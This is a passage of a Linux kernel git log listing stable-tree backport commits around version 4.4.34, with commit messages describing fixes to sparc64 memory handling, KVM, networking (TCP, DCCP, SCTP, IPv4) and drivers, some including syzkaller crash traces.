Linus Walleij [Mon, 14 Nov 2016 14:34:17 +0000 (15:34 +0100)]
i2c: mux: fix up dependencies
commit
93d710a65ef02fb7fd48ae207e78f460bd7a6089 upstream.
We get the following build error from UM Linux after adding
an entry to drivers/iio/gyro/Kconfig that issues "select I2C_MUX":
ERROR: "devm_ioremap_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
ERROR: "of_address_to_resource"
[drivers/i2c/muxes/i2c-mux-reg.ko] undefined!
It appears that the I2C mux core code depends on HAS_IOMEM
for historical reasons, while CONFIG_I2C_MUX_REG does *not*
have a direct dependency on HAS_IOMEM.
This creates a situation where a allyesconfig or allmodconfig
for UM Linux will select I2C_MUX, and will implicitly enable
I2C_MUX_REG as well, and the compilation will fail for the
register driver.
Fix this up by making I2C_MUX_REG depend on HAS_IOMEM and
removing the dependency from I2C_MUX.
Reported-by: kbuild test robot <fengguang.wu@intel.com>
Reported-by: Jonathan Cameron <jic23@jic23.retrosnub.co.uk>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Acked-by: Jonathan Cameron <jic23@kernel.org>
Acked-by: Peter Rosin <peda@axentia.se>
Signed-off-by: Wolfram Sang <wsa@the-dreams.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Oliver Hartkopp [Mon, 24 Oct 2016 19:11:26 +0000 (21:11 +0200)]
can: bcm: fix warning in bcm_connect/proc_register
commit
deb507f91f1adbf64317ad24ac46c56eeccfb754 upstream.
Andrey Konovalov reported an issue with proc_register in bcm.c.
As suggested by Cong Wang this patch adds a lock_sock() protection and
a check for unsuccessful proc_create_data() in bcm_connect().
Reference: http://marc.info/?l=linux-netdev&m=
147732648731237
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Suggested-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Oliver Hartkopp <socketcan@hartkopp.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Azhar Shaikh [Wed, 12 Oct 2016 17:12:20 +0000 (10:12 -0700)]
mfd: intel-lpss: Do not put device in reset state on suspend
commit
274e43edcda6f709aa67e436b3123e45a6270923 upstream.
Commit
41a3da2b8e163 ("mfd: intel-lpss: Save register context on
suspend") saved the register context while going to suspend and
also put the device in reset state.
Due to the resetting of device, system cannot enter S3/S0ix
states when no_console_suspend flag is enabled. The system
and serial console both hang. The resetting of device is not
needed while going to suspend. Hence remove this code.
Fixes:
41a3da2b8e163 ("mfd: intel-lpss: Save register context on suspend")
Signed-off-by: Azhar Shaikh <azhar.shaikh@intel.com>
Acked-by: Mika Westerberg <mika.westerberg@linux.intel.com>
Reviewed-by: Andy Shevchenko <andriy.shevchenko@linux.intel.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Miklos Szeredi [Thu, 18 Aug 2016 07:10:44 +0000 (09:10 +0200)]
fuse: fix fuse_write_end() if zero bytes were copied
commit
59c3b76cc61d1d676f965c192cc7969aa5cb2744 upstream.
If pos is at the beginning of a page and copied is zero then page is not
zeroed but is marked uptodate.
Fix by skipping everything except unlock/put of page if zero bytes were
copied.
Reported-by: Al Viro <viro@zeniv.linux.org.uk>
Fixes:
6b12c1b37e55 ("fuse: Implement write_begin/write_end callbacks")
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Ignacio Alvarado [Fri, 4 Nov 2016 19:15:55 +0000 (12:15 -0700)]
KVM: Disable irq while unregistering user notifier
commit
1650b4ebc99da4c137bfbfc531be4a2405f951dd upstream.
Function user_notifier_unregister should be called only once for each
registered user notifier.
Function kvm_arch_hardware_disable can be executed from an IPI context
which could cause a race condition with a VCPU returning to user mode
and attempting to unregister the notifier.
Signed-off-by: Ignacio Alvarado <ikalvarado@google.com>
Fixes:
18863bdd60f8 ("KVM: x86 shared msr infrastructure")
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Paolo Bonzini [Thu, 17 Nov 2016 14:55:46 +0000 (15:55 +0100)]
KVM: x86: fix missed SRCU usage in kvm_lapic_set_vapic_addr
commit
7301d6abaea926d685832f7e1f0c37dd206b01f4 upstream.
Reported by syzkaller:
[ INFO: suspicious RCU usage. ]
4.9.0-rc4+ #47 Not tainted
-------------------------------
./include/linux/kvm_host.h:536 suspicious rcu_dereference_check() usage!
stack backtrace:
CPU: 1 PID: 6679 Comm: syz-executor Not tainted 4.9.0-rc4+ #47
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
ffff880039e2f6d0 ffffffff81c2e46b ffff88003e3a5b40 0000000000000000
0000000000000001 ffffffff83215600 ffff880039e2f700 ffffffff81334ea9
ffffc9000730b000 0000000000000004 ffff88003c4f8420 ffff88003d3f8000
Call Trace:
[< inline >] __dump_stack lib/dump_stack.c:15
[<
ffffffff81c2e46b>] dump_stack+0xb3/0x118 lib/dump_stack.c:51
[<
ffffffff81334ea9>] lockdep_rcu_suspicious+0x139/0x180 kernel/locking/lockdep.c:4445
[< inline >] __kvm_memslots include/linux/kvm_host.h:534
[< inline >] kvm_memslots include/linux/kvm_host.h:541
[<
ffffffff8105d6ae>] kvm_gfn_to_hva_cache_init+0xa1e/0xce0 virt/kvm/kvm_main.c:1941
[<
ffffffff8112685d>] kvm_lapic_set_vapic_addr+0xed/0x140 arch/x86/kvm/lapic.c:2217
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Fixes:
fda4e2e85589191b123d31cdc21fd33ee70f50fd
Cc: Andrew Honig <ahonig@google.com>
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Reviewed-by: David Hildenbrand <david@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Yazen Ghannam [Tue, 8 Nov 2016 08:35:06 +0000 (09:35 +0100)]
x86/cpu/AMD: Fix cpu_llc_id for AMD Fam17h systems
commit
b0b6e86846093c5f8820386bc01515f857dd8faa upstream.
cpu_llc_id (Last Level Cache ID) derivation on AMD Fam17h has an
underflow bug when extracting the socket_id value. It starts from 0
so subtracting 1 from it will result in an invalid value. This breaks
scheduling topology later on since the cpu_llc_id will be incorrect.
For example, the the cpu_llc_id of the *other* CPU in the loops in
set_cpu_sibling_map() underflows and we're generating the funniest
thread_siblings masks and then when I run 8 threads of nbench, they get
spread around the LLC domains in a very strange pattern which doesn't
give you the normal scheduling spread one would expect for performance.
Other things like EDAC use cpu_llc_id so they will be b0rked too.
So, the APIC ID is preset in APICx020 for bits 3 and above: they contain
the core complex, node and socket IDs.
The LLC is at the core complex level so we can find a unique cpu_llc_id
by right shifting the APICID by 3 because then the least significant bit
will be the Core Complex ID.
Tested-by: Borislav Petkov <bp@suse.de>
Signed-off-by: Yazen Ghannam <Yazen.Ghannam@amd.com>
[ Cleaned up and extended the commit message. ]
Signed-off-by: Borislav Petkov <bp@suse.de>
Acked-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Aravind Gopalakrishnan <aravindksg.lkml@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Fixes:
3849e91f571d ("x86/AMD: Fix last level cache topology for AMD Fam17h systems")
Link: http://lkml.kernel.org/r/20161108083506.rvqb5h4chrcptj7d@pd.tnic
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Greg Kroah-Hartman [Mon, 21 Nov 2016 09:06:53 +0000 (10:06 +0100)]
Linux 4.4.34
David S. Miller [Tue, 25 Oct 2016 04:25:31 +0000 (21:25 -0700)]
sparc64: Delete now unused user copy fixup functions.
[ Upstream commit
0fd0ff01d4c3c01e7fe69b762ee1a13236639acc ]
Now that all of the user copy routines are converted to return
accurate residual lengths when an exception occurs, we no longer need
the broken fixup routines.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 04:22:27 +0000 (21:22 -0700)]
sparc64: Delete now unused user copy assembler helpers.
[ Upstream commit
614da3d9685b67917cab48c8452fd8bf93de0867 ]
All of __ret{,l}_mone{_asi,_fp,_asi_fpu} are now unused.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 04:20:35 +0000 (21:20 -0700)]
sparc64: Convert U3copy_{from,to}_user to accurate exception reporting.
[ Upstream commit
ee841d0aff649164080e445e84885015958d8ff4 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 03:46:44 +0000 (20:46 -0700)]
sparc64: Convert NG2copy_{from,to}_user to accurate exception reporting.
[ Upstream commit
e93704e4464fdc191f73fce35129c18de2ebf95d ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 02:32:12 +0000 (19:32 -0700)]
sparc64: Convert NGcopy_{from,to}_user to accurate exception reporting.
[ Upstream commit
7ae3aaf53f1695877ccd5ebbc49ea65991e41f1e ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 01:58:05 +0000 (18:58 -0700)]
sparc64: Convert NG4copy_{from,to}_user to accurate exception reporting.
[ Upstream commit
95707704800988093a9b9a27e0f2f67f5b4bf2fa ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 23:07:50 +0000 (16:07 -0700)]
sparc64: Convert U1copy_{from,to}_user to accurate exception reporting.
[ Upstream commit
cb736fdbb208eb3420f1a2eb2bfc024a6e9dcada ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 22:26:38 +0000 (15:26 -0700)]
sparc64: Convert GENcopy_{from,to}_user to accurate exception reporting.
[ Upstream commit
d0796b555ba60c22eb41ae39a8362156cb08eee9 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 22:08:18 +0000 (15:08 -0700)]
sparc64: Convert copy_in_user to accurate exception reporting.
[ Upstream commit
0096ac9f47b1a2e851b3165d44065d18e5f13d58 ]
Report the exact number of bytes which have not been successfully
copied when an exception occurs, using the running remaining length.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Mon, 15 Aug 2016 21:47:54 +0000 (14:47 -0700)]
sparc64: Prepare to move to more saner user copy exception handling.
[ Upstream commit
83a17d2661674d8c198adc0e183418f72aabab79 ]
The fixup helper function mechanism for handling user copy fault
handling is not %100 accurrate, and can never be made so.
We are going to transition the code to return the running return
return length, which is always kept track in one or more registers
of each of these routines.
In order to convert them one by one, we have to allow the existing
behavior to continue functioning.
Therefore make all the copy code that wants the fixup helper to be
used return negative one.
After all of the user copy routines have been converted, this logic
and the fixup helpers themselves can be removed completely.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 10 Aug 2016 21:41:33 +0000 (14:41 -0700)]
sparc64: Delete __ret_efault.
[ Upstream commit
aa95ce361ed95c72ac42dcb315166bce5cf1a014 ]
It is completely unused.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Thu, 27 Oct 2016 16:04:54 +0000 (09:04 -0700)]
sparc64: Handle extremely large kernel TLB range flushes more gracefully.
[ Upstream commit
a74ad5e660a9ee1d071665e7e8ad822784a2dc7f ]
When the vmalloc area gets fragmented, and because the firmware
mapping area sits between where modules live and the vmalloc area, we
can sometimes receive requests for enormous kernel TLB range flushes.
When this happens the cpu just spins flushing billions of pages and
this triggers the NMI watchdog and other problems.
We took care of this on the TSB side by doing a linear scan of the
table once we pass a certain threshold.
Do something similar for the TLB flush, however we are limited by
the TLB flush facilities provided by the different chip variants.
First of all we use an (mostly arbitrary) cut-off of 256K which is
about 32 pages. This can be tuned in the future.
The huge range code path for each chip works as follows:
1) On spitfire we flush all non-locked TLB entries using diagnostic
acceses.
2) On cheetah we use the "flush all" TLB flush.
3) On sun4v/hypervisor we do a TLB context flush on context 0, which
unlike previous chips does not remove "permanent" or locked
entries.
We could probably do something better on spitfire, such as limiting
the flush to kernel TLB entries or even doing range comparisons.
However that probably isn't worth it since those chips are old and
the TLB only had 64 entries.
Reported-by: James Clarke <jrtc27@jrtc27.com>
Tested-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 26 Oct 2016 17:20:14 +0000 (10:20 -0700)]
sparc64: Fix illegal relative branches in hypervisor patched TLB cross-call code.
[ Upstream commit
a236441bb69723032db94128761a469030c3fe6d ]
Just like the non-cross-call TLB flush handlers, the cross-call ones need
to avoid doing PC-relative branches outside of their code blocks.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 26 Oct 2016 17:08:22 +0000 (10:08 -0700)]
sparc64: Fix instruction count in comment for __hypervisor_flush_tlb_pending.
[ Upstream commit
830cda3f9855ff092b0e9610346d110846fc497c ]
Noticed by James Clarke.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Tue, 25 Oct 2016 23:23:26 +0000 (16:23 -0700)]
sparc64: Fix illegal relative branches in hypervisor patched TLB code.
[ Upstream commit
b429ae4d5b565a71dfffd759dfcd4f6c093ced94 ]
When we copy code over to patch another piece of code, we can only use
PC-relative branches that target code within that piece of code.
Such PC-relative branches cannot be made to external symbols because
the patch moves the location of the code and thus modifies the
relative address of external symbols.
Use an absolute jmpl to fix this problem.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Wed, 26 Oct 2016 02:43:17 +0000 (19:43 -0700)]
sparc64: Handle extremely large kernel TSB range flushes sanely.
[ Upstream commit
849c498766060a16aad5b0e0d03206726e7d2fa4 ]
If the number of pages we are flushing is more than twice the number
of entries in the TSB, just scan the TSB table for matches rather
than probing each and every page in the range.
Based upon a patch and report by James Clarke.
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
James Clarke [Mon, 24 Oct 2016 18:49:25 +0000 (19:49 +0100)]
sparc: Handle negative offsets in arch_jump_label_transform
[ Upstream commit
9d9fa230206a3aea6ef451646c97122f04777983 ]
Additionally, if the offset will overflow the immediate for a ba,pt
instruction, fall back on a standard ba to get an extra 3 bits.
Signed-off-by: James Clarke <jrtc27@jrtc27.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Mike Kravetz [Fri, 15 Jul 2016 20:08:42 +0000 (13:08 -0700)]
sparc64 mm: Fix base TSB sizing when hugetlb pages are used
[ Upstream commit
af1b1a9b36b8f9d583d4b4f90dd8946ed0cd4bd0 ]
do_sparc64_fault() calculates both the base and huge page RSS sizes and
uses this information in calls to tsb_grow(). The calculation for base
page TSB size is not correct if the task uses hugetlb pages. hugetlb
pages are not accounted for in RSS, therefore the call to get_mm_rss(mm)
does not include hugetlb pages. However, the number of pages based on
huge_pte_count (which does include hugetlb pages) is subtracted from
this value. This will result in an artificially small and often negative
RSS calculation. The base TSB size is then often set to max_tsb_size
as the passed RSS is unsigned, so a negative value looks really big.
THP pages are also accounted for in huge_pte_count, and THP pages are
accounted for in RSS so the calculation in do_sparc64_fault() is correct
if a task only uses THP pages.
A single huge_pte_count is not sufficient for TSB sizing if both hugetlb
and THP pages can be used. Instead of a single counter, use two: one
for hugetlb and one for THP.
Signed-off-by: Mike Kravetz <mike.kravetz@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Dan Carpenter [Fri, 15 Jul 2016 11:17:33 +0000 (14:17 +0300)]
sparc: serial: sunhv: fix a double lock bug
[ Upstream commit
344e3c7734d5090b148c19ac6539b8947fed6767 ]
We accidentally take the "port->lock" twice in a row. This old code
was supposed to be deleted.
Fixes:
e58e241c1788 ('sparc: serial: Clean up the locking for -rt')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
David S. Miller [Thu, 28 Jul 2016 00:50:26 +0000 (17:50 -0700)]
sparc: Don't leak context bits into thread->fault_address
[ Upstream commit
4f6deb8cbab532a8d7250bc09234c1795ecb5e2c ]
On pre-Niagara systems, we fetch the fault address on data TLB
exceptions from the TLB_TAG_ACCESS register. But this register also
contains the context ID assosciated with the fault in the low 13 bits
of the register value.
This propagates into current_thread_info()->fault_address and can
cause trouble later on.
So clear the low 13-bits out of the TLB_TAG_ACCESS value in the cases
where it matters.
Reported-by: Mikulas Patocka <mpatocka@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Peter Hurley [Fri, 27 Nov 2015 19:30:21 +0000 (14:30 -0500)]
tty: Prevent ldisc drivers from re-using stale tty fields
commit
dd42bf1197144ede075a9d4793123f7689e164bc upstream.
Line discipline drivers may mistakenly misuse ldisc-related fields
when initializing. For example, a failure to initialize tty->receive_room
in the N_GIGASET_M101 line discipline was recently found and fixed [1].
Now, the N_X25 line discipline has been discovered accessing the previous
line discipline's already-freed private data [2].
Harden the ldisc interface against misuse by initializing revelant
tty fields before instancing the new line discipline.
[1]
commit
fd98e9419d8d622a4de91f76b306af6aa627aa9c
Author: Tilman Schmidt <tilman@imap.cc>
Date: Tue Jul 14 00:37:13 2015 +0200
isdn/gigaset: reset tty->receive_room when attaching ser_gigaset
[2] Report from Sasha Levin <sasha.levin@oracle.com>
[ 634.336761] ==================================================================
[ 634.338226] BUG: KASAN: use-after-free in x25_asy_open_tty+0x13d/0x490 at addr
ffff8800a743efd0
[ 634.339558] Read of size 4 by task syzkaller_execu/8981
[ 634.340359] =============================================================================
[ 634.341598] BUG kmalloc-512 (Not tainted): kasan: bad access detected
...
[ 634.405018] Call Trace:
[ 634.405277] dump_stack (lib/dump_stack.c:52)
[ 634.405775] print_trailer (mm/slub.c:655)
[ 634.406361] object_err (mm/slub.c:662)
[ 634.406824] kasan_report_error (mm/kasan/report.c:138 mm/kasan/report.c:236)
[ 634.409581] __asan_report_load4_noabort (mm/kasan/report.c:279)
[ 634.411355] x25_asy_open_tty (drivers/net/wan/x25_asy.c:559 (discriminator 1))
[ 634.413997] tty_ldisc_open.isra.2 (drivers/tty/tty_ldisc.c:447)
[ 634.414549] tty_set_ldisc (drivers/tty/tty_ldisc.c:567)
[ 634.415057] tty_ioctl (drivers/tty/tty_io.c:2646 drivers/tty/tty_io.c:2879)
[ 634.423524] do_vfs_ioctl (fs/ioctl.c:43 fs/ioctl.c:607)
[ 634.427491] SyS_ioctl (fs/ioctl.c:622 fs/ioctl.c:613)
[ 634.427945] entry_SYSCALL_64_fastpath (arch/x86/entry/entry_64.S:188)
Cc: Tilman Schmidt <tilman@imap.cc>
Cc: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Peter Hurley <peter@hurleysoftware.com>
Cc: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 10 Nov 2016 21:12:35 +0000 (13:12 -0800)]
tcp: take care of truncations done by sk_filter()
[ Upstream commit
ac6e780070e30e4c35bd395acfe9191e6268bdd3 ]
With syzkaller help, Marco Grassi found a bug in TCP stack,
crashing in tcp_collapse()
Root cause is that sk_filter() can truncate the incoming skb,
but TCP stack was not really expecting this to happen.
It probably was expecting a simple DROP or ACCEPT behavior.
We first need to make sure no part of TCP header could be removed.
Then we need to adjust TCP_SKB_CB(skb)->end_seq
Many thanks to syzkaller team and Marco for giving us a reproducer.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Marco Grassi <marco.gra@gmail.com>
Reported-by: Vladis Dronov <vdronov@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Stephen Suryaputra Lin [Thu, 10 Nov 2016 16:16:15 +0000 (11:16 -0500)]
ipv4: use new_gw for redirect neigh lookup
[ Upstream commit
969447f226b451c453ddc83cac6144eaeac6f2e3 ]
In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().
After commit
5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never gets resolved and the traffic is blackholed.
So, use the new_gw for neigh lookup.
Changes from v1:
- use __ipv4_neigh_lookup instead (per Eric Dumazet).
Fixes:
5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 10 Nov 2016 00:04:46 +0000 (16:04 -0800)]
net: __skb_flow_dissect() must cap its return value
[ Upstream commit
34fad54c2537f7c99d07375e50cb30aa3c23bd83 ]
After Tom patch, thoff field could point past the end of the buffer,
this could fool some callers.
If an skb was provided, skb->len should be the upper limit.
If not, hlen is supposed to be the upper limit.
Fixes:
a6e544b0a88b ("flow_dissector: Jump to exit code in __skb_flow_dissect")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Yibin Yang <yibyang@cisco.com
Acked-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Willem de Bruijn <willemb@google.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Soheil Hassas Yeganeh [Fri, 4 Nov 2016 19:36:49 +0000 (15:36 -0400)]
sock: fix sendmmsg for partial sendmsg
[ Upstream commit
3023898b7d4aac65987bd2f485cc22390aae6f78 ]
Do not send the next message in sendmmsg for partial sendmsg
invocations.
sendmmsg assumes that it can continue sending the next message
when the return value of the individual sendmsg invocations
is positive. It results in corrupting the data for TCP,
SCTP, and UNIX streams.
For example, sendmmsg([["abcd"], ["efgh"]]) can result in a stream
of "aefgh" if the first sendmsg invocation sends only the first
byte while the second sendmsg goes through.
Datagram sockets either send the entire datagram or fail, so
this patch affects only sockets of type SOCK_STREAM and
SOCK_SEQPACKET.
Fixes:
228e548e6020 ("net: Add sendmmsg socket system call")
Signed-off-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: Neal Cardwell <ncardwell@google.com>
Acked-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Alexander Duyck [Fri, 4 Nov 2016 19:11:57 +0000 (15:11 -0400)]
fib_trie: Correct /proc/net/route off by one error
[ Upstream commit
fd0285a39b1cb496f60210a9a00ad33a815603e7 ]
The display of /proc/net/route has had a couple issues due to the fact that
when I originally rewrote most of fib_trie I made it so that the iterator
was tracking the next value to use instead of the current.
In addition it had an off by 1 error where I was tracking the first piece
of data as position 0, even though in reality that belonged to the
SEQ_START_TOKEN.
This patch updates the code so the iterator tracks the last reported
position and key instead of the next expected position and key. In
addition it shifts things so that all of the leaves start at 1 instead of
trying to report leaves starting with offset 0 as being valid. With these
two issues addressed this should resolve any off by one errors that were
present in the display of /proc/net/route.
Fixes:
25b97c016b26 ("ipv4: off-by-one in continuation handling in /proc/net/route")
Cc: Andy Whitcroft <apw@canonical.com>
Reported-by: Jason Baron <jbaron@akamai.com>
Tested-by: Jason Baron <jbaron@akamai.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Marcelo Ricardo Leitner [Thu, 3 Nov 2016 19:03:41 +0000 (17:03 -0200)]
sctp: assign assoc_id earlier in __sctp_connect
[ Upstream commit
7233bc84a3aeda835d334499dc00448373caf5c0 ]
sctp_wait_for_connect() currently already holds the asoc to keep it
alive during the sleep, in case another thread release it. But Andrey
Konovalov and Dmitry Vyukov reported an use-after-free in such
situation.
Problem is that __sctp_connect() doesn't get a ref on the asoc and will
do a read on the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it and the _put on sctp_wait_for_connect
will actually release it, causing the use-after-free.
Fix is, instead of doing the read after waiting for the connect, do it
before so, and avoid this issue as the socket is still locked by then.
There should be no issue on returning the asoc id in case of failure as
the application shouldn't trust on that number in such situations
anyway.
This issue doesn't exist in sctp_sendmsg() path.
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 15:59:46 +0000 (08:59 -0700)]
ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped
[ Upstream commit
990ff4d84408fc55942ca6644f67e361737b3d8e ]
While fuzzing kernel with syzkaller, Andrey reported a nasty crash
in inet6_bind() caused by DCCP lacking a required method.
Fixes:
ab1e0a13d7029 ("[SOCK] proto: Add hashinfo member to struct proto")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Arnaldo Carvalho de Melo <acme@redhat.com>
Acked-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 03:30:48 +0000 (20:30 -0700)]
ipv6: dccp: fix out of bound access in dccp_v6_err()
[ Upstream commit
1aa9d1a0e7eefcc61696e147d123453fc0016005 ]
dccp_v6_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmpv6_notify() are more than enough.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 02:00:40 +0000 (19:00 -0700)]
dccp: fix out of bound access in dccp_v4_err()
[ Upstream commit
6706a97fec963d6cb3f7fc2978ec1427b4651214 ]
dccp_v4_err() does not use pskb_may_pull() and might access garbage.
We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.
This patch might allow to process more ICMP messages, as some routers
are still limiting the size of reflected bytes to 28 (RFC 792), instead
of extended lengths (RFC 1812 4.3.2.3)
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 3 Nov 2016 01:04:24 +0000 (18:04 -0700)]
dccp: do not send reset to already closed sockets
[ Upstream commit
